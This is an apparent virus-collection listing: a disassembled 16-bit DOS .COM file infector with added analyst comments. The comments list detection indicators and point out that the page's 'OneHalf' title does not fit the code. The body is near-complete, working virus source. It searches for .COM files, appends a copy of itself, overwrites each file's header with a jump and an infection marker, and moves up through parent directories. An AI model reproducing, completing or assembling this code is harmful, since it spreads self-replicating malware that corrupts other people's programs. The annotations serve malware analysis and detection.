OneHalf  Virii

CRF

; --------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
; --------------------------------------------------------------------------

; --------------------------------------------------------------------------
; Analyst annotation (added for review; not part of the original disassembly).
; Target: 16-bit real-mode DOS, .COM image, MASM/TASM-style syntax.
; The segment/org/proc opening directives are not present in this listing.
; NOTE(review): the page title attributes this to "OneHalf", but nothing in
; this listing shows encryption, memory residency or boot-sector code; it is
; a small direct-action appending .COM infector. Treat the attribution as
; unverified.
;
; tof ("top of file") is the 4-byte stub at the start of the image:
;   bytes 0-1  short jump to the body
;   byte  2    padding
;   byte  3    value 26 (1Ah), the same value the body later tests for and
;              writes at offset 3 of files it modifies (infection marker)
; --------------------------------------------------------------------------
tof:
jmp short begin ; 2-byte short jump over the saved-bytes buffer to the body
nop ;Reserve 3rd byte
EOFMARK: db 26 ; 4th byte = 1Ah; compared against at `check` before a file is modified

; --------------------------------------------------------------------------
; Saved-bytes buffer + entry point.
; first_four / address / check overlay one 4-byte buffer:
;   first_four = byte 0, address = bytes 1-2 (word), check = byte 3.
; It holds the host's original first four bytes. In this first-generation
; listing the buffer is 90 CD 20 90 (nop / int 20h / nop).
; --------------------------------------------------------------------------
first_four: nop
address: int 20h
check: nop
; Delta-offset computation: call pushes the run-time address of nextline,
; pop retrieves it, and subtracting the assemble-time offset leaves in BP the
; displacement to add to every data reference. The call/pop/sub sequence is a
; common static indicator of position-independent appended code.
begin: call nextline
nextline: pop bp
sub bp,offset nextline

; Reset the per-run counter of modified files.
mov byte ptr [bp+offset infected],0

; Copy the 4 saved host bytes back over the start of the in-memory image so
; the host can run normally afterwards. tof is presumably 100h (the code
; later returns to 100h), though no org directive is visible here.
lea si,[bp+offset first_four]
mov di,offset tof
mov cx,4
cld ; forward copy
rep movsb

; INT 21h AH=1Ah: set the Disk Transfer Address to the body's own buffer so
; directory-search results do not overwrite the host's command tail at PSP:80h.
mov ah,1Ah
lea dx,[bp+offset DTA]
int 21h

; Prepare a Find First (AH=4Eh) for the filespec; the INT 21h itself is
; issued at `continue`. SI is pointed at the filename field of the DTA.
mov ah,4Eh
lea dx,[bp+offset filespec]
lea si,[bp+offset filename]
push dx ; `continue` pops and re-pushes this filespec pointer
jmp short continue

; --------------------------------------------------------------------------
; return: hand control back to the host program.
; Restores the default DTA, clears the general registers, resets SP and
; performs a near return to offset 100h, where the host's original first
; four bytes were put back at entry.
; --------------------------------------------------------------------------
return: mov ah,1ah ; INT 21h AH=1Ah: set DTA
mov dx,80h ; back to offset 80h (default DTA inside the PSP)
int 21h
xor ax,ax ;AX= 0
mov bx,ax ;BX= 0
mov cx,ax ;CX= 0
mov dx,ax ;DX= 0
mov si,ax ;SI= 0
mov di,ax ;DI= 0
mov sp,0FFFEh ;SP= 0FFFEh (also discards the filespec pointer left on the stack)
mov bp,100h ; target address of the host entry point
push bp ; pushed so that the RET below pops it into IP
mov bp,ax ; BP= 0
ret ; near return -> continues execution at 100h

; --------------------------------------------------------------------------
; nextfile / skipclose / continue: directory-scan step.
; In:  BX = open file handle, or 0 if none is open
;      AH = 4Eh (Find First) when entered at `continue` from setup,
;           4Fh (Find Next) when reached through `skipclose`
;      top of stack = pointer to the filespec
; --------------------------------------------------------------------------
nextfile: or bx,bx ; is a handle still open?
jz skipclose
mov ah,3Eh ; INT 21h AH=3Eh: close handle in BX
int 21h
xor bx,bx ; mark "no handle open"
skipclose: mov ah,4Fh ; select Find Next, then fall through

continue: pop dx ; DX = filespec pointer ...
push dx ; ... kept on the stack for the next pass
xor cx,cx ; search attribute mask = 0
xor bx,bx ; no handle open yet for the next candidate
int 21h ; Find First / Find Next; result is placed in the DTA
jnc skipjmp ; CF clear: a matching entry was found
jmp NoneLeft ; CF set: search exhausted or failed


; --------------------------------------------------------------------------
; skipjmp: examine one candidate file and, if it passes the checks, append
; the body and patch the first four bytes.
; In:  SI = pointer to the filename field of the DTA
;
; Observable effects on a modified file (useful for detection/triage):
;   * length grows by 4 + (eof - begin) bytes
;   * byte 0 becomes E9h (near jump), byte 3 becomes 1Ah (26)
;   * the original first four bytes are stored at the old end of file
;   * no call in this listing reads or restores the file's date/time or
;     attributes, so the last-write timestamp is not preserved
; Return status (CF) of the seek and write calls is not tested.
; --------------------------------------------------------------------------
skipjmp: mov ax,3D02h ; INT 21h AH=3Dh: open, AL=02 read/write
mov dx,si ; DS:DX = name from the DTA
int 21h
jc nextfile ; open failed (e.g. file not openable for writing): skip it

mov bx,ax ; BX = file handle
mov ah,3Fh ; INT 21h AH=3Fh: read
mov cx,4 ; first four bytes of the file ...
lea dx,[bp+offset first_four] ; ... into the saved-bytes buffer
int 21h
cmp byte ptr [bp+offset check],26 ; byte 3 == 1Ah: marker already present
je nextfile
cmp byte ptr [bp+offset first_four],77 ; byte 0 == 'M' (4Dh); presumably skips EXE-format files
je nextfile
mov ax,4202h ; INT 21h AH=42h AL=02: seek relative to end of file
xor cx,cx
xor dx,dx ; offset 0 -> DX:AX returns the file length
int 21h

cmp ax,0FD00h ; size limit; only the low word (AX) is examined
ja nextfile
mov [bp+offset addr],ax ; remember the original length

mov ah,40h ; INT 21h AH=40h: write at current position (end of file)
mov cx,4 ; the host's original first four bytes
lea dx,[bp+offset first_four]
int 21h
mov ah,40h ; write again, directly after those four bytes
mov cx,offset eof-offset begin ; length of the body from `begin` up to `eof`
lea dx,[bp+offset begin]
int 21h

mov ax,4200h ; INT 21h AH=42h AL=00: seek to start of file
xor cx,cx
xor dx,dx
int 21h

; Build the replacement header in the same 4-byte buffer. A near jump at
; offset 0 with displacement (length + 1) lands at file offset length + 4,
; i.e. just past the four saved bytes, on the appended copy of `begin`.
mov ax,[bp+offset addr]
inc ax

mov [bp+offset address],ax ; bytes 1-2: jump displacement
mov byte ptr [bp+offset first_four],0E9h ; byte 0: near-jump opcode
mov byte ptr [bp+offset check],26 ; byte 3: marker (1Ah)

mov ah,40h ; write the 4-byte header over the start of the file
mov cx,4
lea dx,[bp+offset first_four]
int 21h

inc byte ptr [bp+offset infected] ; count this file
jmp nextfile ; close the handle and continue the scan

; --------------------------------------------------------------------------
; NoneLeft: reached when the directory search reports no (more) matches.
; Decides whether to stop or to move to the parent directory and search
; again. The `infected` counter is consulted only here, after the scan of the
; current directory has been exhausted.
; --------------------------------------------------------------------------
NoneLeft: cmp byte ptr [bp+offset infected],2
jae TheEnd ;The party's over!

mov di,100h ;DI= 100h
cmp word ptr [di],20CDh ; does the restored host start with CD 20 (int 20h)?
je TheEnd

lea dx,[bp+offset prevdir]
mov ah,3Bh ; INT 21h AH=3Bh: change current directory to ".."
int 21h
jc TheEnd ; chdir failed: stop
mov ah,4Eh ; restart with Find First in the new directory
jmp continue

TheEnd: jmp return ; restore DTA/registers and run the host

; --------------------------------------------------------------------------
; Constant data (included in the bytes written to a modified file, since it
; lies before `eof`). The two zero-terminated strings are simple static
; indicators when found next to each other in a .COM file.
; --------------------------------------------------------------------------
filespec: db '*.COM',0 ; search pattern passed to Find First
prevdir: db '..',0 ; argument for the change-directory call

; `eof` marks the end of the written body (write length is eof - begin).
; Everything below is uninitialised scratch space that is used in memory but
; not stored in the file.
eof:
; Private Disk Transfer Area. The first 21 bytes are the reserved area DOS
; fills in during Find First / Find Next; the named fields that follow line
; up with the rest of the DOS search record.
DTA: db 21 dup (?)

attribute db ? ; attribute of the matched entry
file_time db 2 dup (?)
file_date db 2 dup (?)
file_size db 4 dup (?)
filename db 13 dup (?) ; zero-terminated name; SI points here during the scan

infected db ? ; number of files modified during this run

addr dw ? ; original length (low word) of the file being processed

; NOTE(review): the matching `main proc` / `code segment` / `org` openers for
; the directives below are not present in this listing.
main endp
code ends

end main